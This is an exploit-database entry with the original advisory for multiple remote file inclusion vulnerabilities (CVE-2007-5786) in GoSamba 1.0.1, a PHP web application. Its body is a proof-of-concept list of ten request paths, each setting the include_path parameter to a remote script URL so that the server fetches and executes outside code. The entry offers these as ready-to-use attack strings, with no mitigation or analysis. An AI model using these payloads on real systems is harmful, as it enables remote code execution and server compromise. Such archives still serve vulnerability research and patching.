GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2007-10-26 
date_updated: 2016-10-20 
verified: 1 
codes: OSVDB-40714;CVE-2007-5786;OSVDB-40713;OSVDB-40712;OSVDB-40711;OSVDB-40710;OSVDB-40709;OSVDB-40708;OSVDB-40707;OSVDB-40706;OSVDB-40705 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comgosamba.1.0.1.tar.gz

#################################################################################
#  GoSamba 1.0.1 (include_path) Multiple Remote File Inclusion Vulnerabilities
#  http://mesh.dl.sourceforge.net/sourceforge/gosamba/gosamba.1.0.1.tar.gz
#  POC :
#  /inc_group.php?include_path=http://localhost/scripts/020.txt?
#  /inc_manager.php?include_path=http://localhost/scripts/020.txt?
#  /inc_newgroup.php.php?include_path=http://localhost/scripts/020.txt?
#  /inc_smb_conf.php?include_path=http://localhost/scripts/020.txt?
#  /inc_user.php?include_path=http://localhost/scripts/020.txt?
#  /main.php?include_path=http://localhost/scripts/020.txt?
#  /include/HTML_oben.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe1.php?include_path=http://localhost/scripts/020.txt?
#  /include/inc_freigabe3.php?include_path=http://localhost/scripts/020.txt?
#################################################################################

# milw0rm.com [2007-10-27]